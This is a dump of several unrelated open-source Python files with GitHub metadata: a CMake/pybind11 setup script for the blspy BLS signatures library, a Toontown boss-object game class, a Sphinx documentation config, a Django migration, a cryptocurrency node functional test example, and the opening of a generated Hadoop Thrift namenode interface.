"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fixture/contact.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "40150"
}
],
"symlink_target": ""
}
|
import os
import platform
import re
import subprocess
import sys
from distutils.version import LooseVersion
from setuptools import Extension, setup, setuptools
from setuptools.command.build_ext import build_ext
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=""):
Extension.__init__(self, name, sources=["./"])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
try:
out = subprocess.check_output(["cmake", "--version"])
except OSError:
raise RuntimeError(
"CMake must be installed to build"
+ " the following extensions: "
+ ", ".join(e.name for e in self.extensions)
)
if platform.system() == "Windows":
cmake_version = LooseVersion(
re.search(r"version\s*([\d.]+)", out.decode()).group(1)
)
if cmake_version < "3.1.0":
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
cmake_args = [
"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=" + extdir,
"-DPYTHON_EXECUTABLE=" + sys.executable,
]
cfg = "Debug" if self.debug else "Release"
build_args = ["--config", cfg]
if platform.system() == "Windows":
cmake_args += [
"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}".format(cfg.upper(), extdir)
]
if sys.maxsize > 2 ** 32:
cmake_args += ["-A", "x64"]
build_args += ["--", "/m"]
else:
cmake_args += ["-DCMAKE_BUILD_TYPE=" + cfg]
build_args += ["--", "-j", "6"]
env = os.environ.copy()
env["CXXFLAGS"] = '{} -DVERSION_INFO=\\"{}\\"'.format(
env.get("CXXFLAGS", ""), self.distribution.get_version()
)
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(
["cmake", ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env
)
subprocess.check_call(
["cmake", "--build", "."] + build_args, cwd=self.build_temp
)
class get_pybind_include(object):
"""Helper class to determine the pybind11 include path
The purpose of this class is to postpone importing pybind11
until it is actually installed, so that the ``get_include()``
method can be invoked."""
def __init__(self, user=False):
self.user = user
def __str__(self):
import pybind11
return pybind11.get_include(self.user)
ext_modules = [
Extension(
"blspy",
[
"src/elements.cpp",
"src/schemes.cpp",
"src/privatekey.cpp",
"src/bls.cpp",
"python-bindings/pythonbindings.cpp",
],
include_dirs=[
# Path to pybind11 headers
get_pybind_include(),
get_pybind_include(user=True),
"relic_ietf_64/include",
"mpir_gc_x64",
"libsodium/include",
],
library_dirs=[
"relic_ietf_64",
"mpir_gc_x64",
"libsodium/x64/Release/v142/static",
],
libraries=["relic_s", "Advapi32", "mpir", "libsodium"],
language="c++",
),
]
# As of Python 3.6, CCompiler has a `has_flag` method.
# cf http://bugs.python.org/issue26689
def has_flag(compiler, flagname):
"""Return a boolean indicating whether a flag name is supported on
the specified compiler.
"""
import tempfile
with tempfile.NamedTemporaryFile("w", suffix=".cpp") as f:
f.write("int main (int argc, char **argv) { return 0; }")
try:
compiler.compile([f.name], extra_postargs=[flagname])
except setuptools.distutils.errors.CompileError:
return False
return True
def cpp_flag(compiler):
"""Return the -std=c++[11/14/17] compiler flag.
The newer version is prefered over c++11 (when it is available).
"""
flags = ["-std=c++17", "-std=c++14", "-std=c++11"]
for flag in flags:
if has_flag(compiler, flag):
return flag
raise RuntimeError("Unsupported compiler -- at least C++11 support " "is needed!")
class BuildExt(build_ext):
"""A custom build extension for adding compiler-specific options."""
c_opts = {
"msvc": ["/EHsc", "/std:c++17", "/DBLSALLOC_SODIUM=1", "/DSODIUM_STATIC"],
"unix": [],
}
l_opts = {
"msvc": [],
"unix": [],
}
if sys.platform == "darwin":
darwin_opts = ["-stdlib=libc++", "-mmacosx-version-min=10.14"]
c_opts["unix"] += darwin_opts
l_opts["unix"] += darwin_opts
def build_extensions(self):
ct = self.compiler.compiler_type
opts = self.c_opts.get(ct, [])
link_opts = self.l_opts.get(ct, [])
if ct == "unix":
opts.append('-DVERSION_INFO="%s"' % self.distribution.get_version())
opts.append(cpp_flag(self.compiler))
if has_flag(self.compiler, "-fvisibility=hidden"):
opts.append("-fvisibility=hidden")
elif ct == "msvc":
if sys.version_info < (3, 9):
ver_flag = '/DVERSION_INFO=\\"%s\\"'
else:
ver_flag = '-DVERSION_INFO="%s"'
opts.append(ver_flag % self.distribution.get_version())
for ext in self.extensions:
ext.extra_compile_args = opts
ext.extra_link_args = link_opts
build_ext.build_extensions(self)
if platform.system() == "Windows":
setup(
name="blspy",
author="Mariano Sorgente",
author_email="mariano@chia.net",
description="BLS signatures in c++ (with python bindings)",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/Chia-Network/bls-signatures",
python_requires=">=3.7",
setup_requires=["pybind11>=2.5.0"],
install_requires=["pybind11>=2.5.0"],
ext_modules=ext_modules,
cmdclass={"build_ext": BuildExt},
zip_safe=False,
)
else:
setup(
name="blspy",
author="Mariano Sorgente",
author_email="mariano@chia.net",
description="BLS signatures in c++ (python bindings)",
python_requires=">=3.7",
install_requires=["wheel"],
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/Chia-Network/bls-signatures",
ext_modules=[CMakeExtension("blspy", ".")],
cmdclass=dict(build_ext=CMakeBuild),
zip_safe=False,
)
|
{
"content_hash": "4a9aa13a39f2ec8f65615b9428927287",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 86,
"avg_line_length": 31.81651376146789,
"alnum_prop": 0.5537773933102653,
"repo_name": "Darknet-Crypto/Darknet",
"id": "1b0d7b2b13b591cc7ce31134473b5615af91ba5c",
"size": "6955",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/chiabls/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "989197"
},
{
"name": "C++",
"bytes": "4389178"
},
{
"name": "CSS",
"bytes": "147645"
},
{
"name": "Groff",
"bytes": "18020"
},
{
"name": "HTML",
"bytes": "53221"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "144432"
},
{
"name": "Makefile",
"bytes": "95444"
},
{
"name": "Objective-C",
"bytes": "4147"
},
{
"name": "Objective-C++",
"bytes": "7285"
},
{
"name": "Protocol Buffer",
"bytes": "2308"
},
{
"name": "Python",
"bytes": "211616"
},
{
"name": "QMake",
"bytes": "26302"
},
{
"name": "Shell",
"bytes": "45341"
}
],
"symlink_target": ""
}
|
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedSmoothNode
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.fsm import FSM
from direct.task import Task
smileyDoId = 1
class DistributedCashbotBossObject(DistributedSmoothNode.DistributedSmoothNode, FSM.FSM):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedCashbotBossObject')
wantsWatchDrift = 1
def __init__(self, cr):
DistributedSmoothNode.DistributedSmoothNode.__init__(self, cr)
FSM.FSM.__init__(self, 'DistributedCashbotBossObject')
self.boss = None
self.avId = 0
self.craneId = 0
self.cleanedUp = 0
self.collisionNode = CollisionNode('object')
self.collisionNode.setIntoCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.WallBitmask | ToontownGlobals.CashbotBossObjectBitmask | OTPGlobals.CameraBitmask)
self.collisionNode.setFromCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.FloorBitmask)
self.collisionNodePath = NodePath(self.collisionNode)
self.physicsActivated = 0
self.toMagnetSoundInterval = Sequence()
self.hitFloorSoundInterval = Sequence()
self.hitBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_safe_miss.ogg')
self.hitBossSoundInterval = SoundInterval(self.hitBossSfx)
self.touchedBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_sandbag.ogg')
self.touchedBossSoundInterval = SoundInterval(self.touchedBossSfx, duration=0.8)
self.lerpInterval = None
return
def disable(self):
self.cleanup()
self.stopSmooth()
DistributedSmoothNode.DistributedSmoothNode.disable(self)
def cleanup(self):
if self.cleanedUp:
return
else:
self.cleanedUp = 1
self.demand('Off')
self.detachNode()
self.toMagnetSoundInterval.finish()
self.hitFloorSoundInterval.finish()
self.hitBossSoundInterval.finish()
self.touchedBossSoundInterval.finish()
del self.toMagnetSoundInterval
del self.hitFloorSoundInterval
del self.hitBossSoundInterval
del self.touchedBossSoundInterval
self.boss = None
return
def setupPhysics(self, name):
an = ActorNode('%s-%s' % (name, self.doId))
anp = NodePath(an)
if not self.isEmpty():
self.reparentTo(anp)
NodePath.assign(self, anp)
self.physicsObject = an.getPhysicsObject()
self.setTag('object', str(self.doId))
self.collisionNodePath.reparentTo(self)
self.handler = PhysicsCollisionHandler()
self.handler.addCollider(self.collisionNodePath, self)
self.collideName = self.uniqueName('collide')
self.handler.addInPattern(self.collideName + '-%in')
self.handler.addAgainPattern(self.collideName + '-%in')
self.watchDriftName = self.uniqueName('watchDrift')
def activatePhysics(self):
if not self.physicsActivated:
self.boss.physicsMgr.attachPhysicalNode(self.node())
base.cTrav.addCollider(self.collisionNodePath, self.handler)
self.physicsActivated = 1
self.accept(self.collideName + '-floor', self.__hitFloor)
self.accept(self.collideName + '-goon', self.__hitGoon)
self.acceptOnce(self.collideName + '-headTarget', self.__hitBoss)
self.accept(self.collideName + '-dropPlane', self.__hitDropPlane)
def deactivatePhysics(self):
if self.physicsActivated:
self.boss.physicsMgr.removePhysicalNode(self.node())
base.cTrav.removeCollider(self.collisionNodePath)
self.physicsActivated = 0
self.ignore(self.collideName + '-floor')
self.ignore(self.collideName + '-goon')
self.ignore(self.collideName + '-headTarget')
self.ignore(self.collideName + '-dropPlane')
def hideShadows(self):
pass
def showShadows(self):
pass
def stashCollisions(self):
self.collisionNodePath.stash()
def unstashCollisions(self):
self.collisionNodePath.unstash()
def __hitFloor(self, entry):
if self.state == 'Dropped' or self.state == 'LocalDropped':
self.d_hitFloor()
self.demand('SlidingFloor', localAvatar.doId)
def __hitGoon(self, entry):
if self.state == 'Dropped' or self.state == 'LocalDropped':
goonId = int(entry.getIntoNodePath().getNetTag('doId'))
goon = self.cr.doId2do.get(goonId)
if goon:
self.doHitGoon(goon)
def doHitGoon(self, goon):
pass
def __hitBoss(self, entry):
if (self.state == 'Dropped' or self.state == 'LocalDropped') and self.craneId != self.boss.doId:
vel = self.physicsObject.getVelocity()
vel = self.crane.root.getRelativeVector(render, vel)
vel.normalize()
impact = vel[1]
if impact >= self.getMinImpact():
print 'hit! %s' % impact
self.hitBossSoundInterval.start()
self.doHitBoss(impact)
else:
self.touchedBossSoundInterval.start()
print '--not hard enough: %s' % impact
def doHitBoss(self, impact):
self.d_hitBoss(impact)
def __hitDropPlane(self, entry):
self.notify.info('%s fell out of the world.' % self.doId)
self.fellOut()
def fellOut(self):
raise StandardError, 'fellOut unimplented'
def getMinImpact(self):
return 0
def __watchDrift(self, task):
v = self.physicsObject.getVelocity()
if abs(v[0]) < 0.0001 and abs(v[1]) < 0.0001:
self.d_requestFree()
self.demand('Free')
return Task.cont
def prepareGrab(self):
pass
def prepareRelease(self):
pass
def setBossCogId(self, bossCogId):
self.bossCogId = bossCogId
self.boss = base.cr.doId2do[bossCogId]
def setObjectState(self, state, avId, craneId):
if state == 'G':
self.demand('Grabbed', avId, craneId)
elif state == 'D':
if self.state != 'Dropped':
self.demand('Dropped', avId, craneId)
elif state == 's':
if self.state != 'SlidingFloor':
self.demand('SlidingFloor', avId)
elif state == 'F':
self.demand('Free')
else:
self.notify.error('Invalid state from AI: %s' % state)
def d_requestGrab(self):
self.sendUpdate('requestGrab')
def rejectGrab(self):
if self.state == 'LocalGrabbed':
self.demand('LocalDropped', self.avId, self.craneId)
def d_requestDrop(self):
self.sendUpdate('requestDrop')
def d_hitFloor(self):
self.sendUpdate('hitFloor')
def d_requestFree(self):
self.sendUpdate('requestFree', [self.getX(),
self.getY(),
self.getZ(),
self.getH()])
def d_hitBoss(self, impact):
self.sendUpdate('hitBoss', [impact])
def defaultFilter(self, request, args):
if self.boss == None:
raise FSM.RequestDenied, request
return FSM.FSM.defaultFilter(self, request, args)
def enterOff(self):
self.detachNode()
if self.lerpInterval:
self.lerpInterval.finish()
self.lerpInterval = None
return
def exitOff(self):
self.reparentTo(render)
def enterLocalGrabbed(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
self.hideShadows()
self.prepareGrab()
self.crane.grabObject(self)
def exitLocalGrabbed(self):
if self.newState != 'Grabbed':
self.crane.dropObject(self)
self.prepareRelease()
del self.crane
self.showShadows()
def enterGrabbed(self, avId, craneId):
if self.oldState == 'LocalGrabbed':
if craneId == self.craneId:
return
else:
self.crane.dropObject(self)
self.prepareRelease()
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
self.hideShadows()
self.prepareGrab()
self.crane.grabObject(self)
def exitGrabbed(self):
self.crane.dropObject(self)
self.prepareRelease()
self.showShadows()
del self.crane
def enterLocalDropped(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
self.activatePhysics()
self.startPosHprBroadcast()
self.hideShadows()
self.handler.setStaticFrictionCoef(0)
self.handler.setDynamicFrictionCoef(0)
def exitLocalDropped(self):
if self.newState != 'SlidingFloor' and self.newState != 'Dropped':
self.deactivatePhysics()
self.stopPosHprBroadcast()
del self.crane
self.showShadows()
def enterDropped(self, avId, craneId):
self.avId = avId
self.craneId = craneId
self.crane = self.cr.doId2do.get(craneId)
if self.avId == base.localAvatar.doId:
self.activatePhysics()
self.startPosHprBroadcast()
self.handler.setStaticFrictionCoef(0)
self.handler.setDynamicFrictionCoef(0)
else:
self.startSmooth()
self.hideShadows()
def exitDropped(self):
if self.avId == base.localAvatar.doId:
if self.newState != 'SlidingFloor':
self.deactivatePhysics()
self.stopPosHprBroadcast()
else:
self.stopSmooth()
del self.crane
self.showShadows()
def enterSlidingFloor(self, avId):
self.avId = avId
if self.lerpInterval:
self.lerpInterval.finish()
self.lerpInterval = None
if self.avId == base.localAvatar.doId:
self.activatePhysics()
self.startPosHprBroadcast()
self.handler.setStaticFrictionCoef(0.9)
self.handler.setDynamicFrictionCoef(0.5)
if self.wantsWatchDrift:
taskMgr.add(self.__watchDrift, self.watchDriftName)
else:
self.startSmooth()
self.hitFloorSoundInterval.start()
return
def exitSlidingFloor(self):
if self.avId == base.localAvatar.doId:
taskMgr.remove(self.watchDriftName)
self.deactivatePhysics()
self.stopPosHprBroadcast()
else:
self.stopSmooth()
def enterFree(self):
self.avId = 0
self.craneId = 0
def exitFree(self):
pass
|
{
"content_hash": "ee5ee67158265ff30371fe7a365f3b82",
"timestamp": "",
"source": "github",
"line_count": 322,
"max_line_length": 168,
"avg_line_length": 34.08385093167702,
"alnum_prop": 0.6152164009111617,
"repo_name": "linktlh/Toontown-journey",
"id": "9928e8211ddca13c4e9263f475b2cc77d6ef48e3",
"size": "10975",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "toontown/coghq/DistributedCashbotBossObject.py",
"mode": "33261",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import python_demopackaging
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Python DemoPackaging'
copyright = u"2017, siva"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = python_demopackaging.__version__
# The full version, including alpha/beta/rc tags.
release = python_demopackaging.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'python_demopackagingdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'python_demopackaging.tex',
u'Python DemoPackaging Documentation',
u'siva', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'python_demopackaging',
u'Python DemoPackaging Documentation',
[u'siva'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'python_demopackaging',
u'Python DemoPackaging Documentation',
u'siva',
'python_demopackaging',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
{
"content_hash": "845870bad6c484216bccf61bb2a5ee8d",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 76,
"avg_line_length": 31.034615384615385,
"alnum_prop": 0.7055397199157268,
"repo_name": "sivakumar105/Python-DemoPackaging",
"id": "3f1a41f3f7e38a684d26b998e8570a3ffb9c4bb6",
"size": "8524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2347"
},
{
"name": "Python",
"bytes": "6188"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('profiles', '0004_profile_job'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='location',
field=models.CharField(default=b'My location', max_length=1200, blank=True),
),
]
|
{
"content_hash": "b4a0e5f19e8dd728c2119eacd0ddfca9",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 88,
"avg_line_length": 22.944444444444443,
"alnum_prop": 0.6053268765133172,
"repo_name": "suzp1984/django-tutorial",
"id": "a61f0eddbc5443716ef7b7f73ae2827b214ef843",
"size": "437",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tryDjango/profiles/migrations/0005_auto_20150924_1438.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "42439"
},
{
"name": "HTML",
"bytes": "21"
},
{
"name": "JavaScript",
"bytes": "77703"
},
{
"name": "Python",
"bytes": "8157"
}
],
"symlink_target": ""
}
|
"""An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports if possible
from test_framework.blocktools import (create_block, create_coinbase)
from test_framework.mininode import (
CInv,
NetworkThread,
NodeConn,
NodeConnCB,
mininode_lock,
msg_block,
msg_getdata,
wait_until,
)
from test_framework.test_framework import StatusquoTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
p2p_port,
)
# NodeConnCB is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass NodeConnCB and
# override the on_*() methods if you need custom behaviour.
class BaseNode(NodeConnCB):
def __init__(self):
"""Initialize the NodeConnCB
Used to inialize custom properties for the Node that aren't
included by default in the base class. Be aware that the NodeConnCB
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, conn, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_sha256()
self.block_receive_map[message.block.sha256] += 1
def on_inv(self, conn, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the StatusquoTestFramework
pass
class ExampleTest(StatusquoTestFramework):
# Each functional test is a subclass of the StatusquoTestFramework class.
# Override the __init__(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def __init__(self):
"""Initialize the test
Call super().__init__() first, and then override any test parameters
for your individual test."""
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished __init__") # Oops! Can't run self.log before run_test()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
def setup_network(self):
"""Setup the test network topology
Often you won't need to override this, since the standard network topology
(linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
If you do override this method, remember to start the nodes, assign
them to self.nodes, connect them and then sync."""
self.setup_nodes()
# In this test, we're not connecting node2 to node0 or node1. Calls to
# sync_all() should not include node2, since we're not expecting it to
# sync.
connect_nodes(self.nodes[0], 1)
self.sync_all([self.nodes[0:1]])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
StatusquoTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
# Create a P2P connection to one of the nodes
node0 = BaseNode()
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0))
node0.add_connection(connections[0])
# Start up network handling in another thread. This needs to be called
# after the P2P connections have been created.
NetworkThread().start()
# wait_for_verack ensures that the P2P connection is fully up.
node0.wait_for_verack()
# Generating a block on one of the nodes will get us out of IBD
blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)]
self.sync_all([self.nodes[0:1]])
# Notice above how we called an RPC by calling a method with the same
# name on the node object. Notice also how we used a keyword argument
# to specify a named RPC argument. Neither of those are defined on the
# node object. Instead there's some __getattr__() magic going on under
# the covers to dispatch unrecognised attribute calls to the RPC
# interface.
# Logs are nice. Do plenty of them. They can be used in place of comments for
# breaking the test into sub-sections.
self.log.info("Starting test!")
self.log.info("Calling a custom function")
custom_function()
self.log.info("Calling a custom method")
self.custom_method()
self.log.info("Create some blocks")
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
height = 1
for i in range(10):
# Use the mininode and blocktools functionality to manually build a block
# Calling the generate() rpc is easier, but this allows us to exactly
# control the blocks and transactions.
block = create_block(self.tip, create_coinbase(height), self.block_time)
block.solve()
block_message = msg_block(block)
# Send message is used to send a P2P message to the node over our NodeConn connection
node0.send_message(block_message)
self.tip = block.sha256
blocks.append(self.tip)
self.block_time += 1
height += 1
self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
self.nodes[1].waitforblockheight(11)
self.log.info("Connect node2 and node1")
connect_nodes(self.nodes[1], 2)
self.log.info("Add P2P connection to node2")
node2 = BaseNode()
connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))
node2.add_connection(connections[1])
node2.wait_for_verack()
self.log.info("Wait for node2 reach current tip. Test that it has propogated all the blocks to us")
getdata_request = msg_getdata()
for block in blocks:
getdata_request.inv.append(CInv(2, block))
node2.send_message(getdata_request)
# wait_until() will loop until a predicate condition is met. Use it to test properties of the
# NodeConnCB objects.
assert wait_until(lambda: sorted(blocks) == sorted(list(node2.block_receive_map.keys())), timeout=5)
self.log.info("Check that each block was received only once")
# The network thread uses a global lock on data access to the NodeConn objects when sending and receiving
# messages. The test thread should acquire the global lock before accessing any NodeConn data to avoid locking
# and synchronization issues. Note wait_until() acquires this global lock when testing the predicate.
with mininode_lock:
for block in node2.block_receive_map.values():
assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
|
{
"content_hash": "a4d1619c607f43541e2f6e895b2eaba4",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 118,
"avg_line_length": 39.96803652968037,
"alnum_prop": 0.6568033816977037,
"repo_name": "Exgibichi/statusquo",
"id": "2e8a07462ea097481ec61537811a8207ff5ba8da",
"size": "8962",
"binary": false,
"copies": "1",
"ref": "refs/heads/0.15",
"path": "test/functional/example_test.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28452"
},
{
"name": "C",
"bytes": "693663"
},
{
"name": "C++",
"bytes": "5234740"
},
{
"name": "HTML",
"bytes": "21860"
},
{
"name": "Java",
"bytes": "30306"
},
{
"name": "M4",
"bytes": "193642"
},
{
"name": "Makefile",
"bytes": "113698"
},
{
"name": "Objective-C",
"bytes": "3782"
},
{
"name": "Objective-C++",
"bytes": "7244"
},
{
"name": "Protocol Buffer",
"bytes": "2336"
},
{
"name": "Python",
"bytes": "1209225"
},
{
"name": "QMake",
"bytes": "758"
},
{
"name": "Shell",
"bytes": "57764"
}
],
"symlink_target": ""
}
|
from thrift.Thrift import *
import hadoop.api.common.HadoopServiceBase
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface(hadoop.api.common.HadoopServiceBase.Iface):
"""
Provides an interface to a Hadoop Namenode. It is basically a Thrift
translation of org.apache.hadoop.hdfs.protocol.ClientProtocol.
"""
def chmod(self, ctx, path, perms):
"""
Set permissions of an existing file or directory.
Parameters:
- ctx
- path: Path of the file or directory.
- perms: New permissions for the file or directory.
